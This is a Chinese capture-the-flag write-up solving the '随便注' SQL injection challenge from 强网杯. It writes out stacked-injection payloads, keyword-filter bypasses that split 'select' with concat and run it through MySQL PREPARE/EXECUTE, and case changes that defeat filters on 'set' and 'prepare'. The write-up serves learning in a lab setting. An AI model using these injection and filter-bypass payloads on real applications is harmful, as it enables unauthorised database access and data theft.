[强网杯 随便注]总结

0x00 前言

  由于这道题过滤了大部分常用的查询语句,本菜鸡得到字段名是一点办法没有,之后参考一位师傅的文章还是学习到了很多的姿势.


0x01 涉及知识点

  1)堆叠注入,这里不详细说了.

  2)Mysql预处理语句:

    1.prepare:准备一条sql语句,并分配给这个语句一个名字供之后使用.

    2.execute:执行该语句

    3.deallocate prepare:释放语句

    

PREPARE stmt_name FROM preparable_stmt

EXECUTE stmt_name    [USING @var_name [, @var_name] ...] 

{DEALLOCATE | DROP} PREPARE stmt_name

    个人以为这种预处理可以理解位函数的执行过程:[定义函数,确定参数]->[传入参数,执行函数]->[释放空间]


0x02 解题

  1)查询[1'],确定是字符型注入

  [强网杯 随便注]总结

 

 

   2)猜解字段数,查询[1' order by 3 #],报错,尝试[1' order by 2 #],正常

[强网杯 随便注]总结

 

 

 [强网杯 随便注]总结

 

   3)尝试联合查询[1' and 1=0 union select 1,2 #],查询发现关键字被过滤,由于preg_match()函数的是匹配次数,所以双写绕过无效,正则中的/i模式是忽略大小写,所以大小写绕过无效.

[强网杯 随便注]总结

 

   4)尝试堆叠注入[1';show databases #],先查数据库名,可行.

[强网杯 随便注]总结

 

   5)常规思路,查表名:[1';show tables #]

  [强网杯 随便注]总结

 

   6)查询words字段名:[1';show columns from `words` #]

[强网杯 随便注]总结

 

   查询数字表中的字段值:[1';show columns from `1919810931114514` #],看到flag字段.

[强网杯 随便注]总结

 

  这里有个小知识点就是表名要用`  `(反括号)引起来,注意一下.

  7)堆叠注入到这里就没办法了,因为堆叠注入查询不到字段的具体值.

  8)下面就参考师傅的方法,使用上面说到的预定义语句.

  

set @a=concat("sel","ect flag from `1919810931114514`");  
prepare inject from @a;  //给这条语句起名inject
execute inject;             //执行该语句

 

   

  尝试注入[1';set @a=concat("sel","ect flag from `1919810931114514`");prepare inject from @a;execute inject; #]

[强网杯 随便注]总结

 

   发现"set"和"prepare"被过滤,那么就试试大写绕过:[1';Set @a=concat("sel","ect flag from `1919810931114514`");Prepare inject from @a;execute inject; #]

[强网杯 随便注]总结

 

   感谢出题人的怜悯,大写可以绕过,得到flag.

 

上一篇:asp.net(C#)html无限分类树 可新增 删除 修改


下一篇:[Node] Prepare a package to be published to npm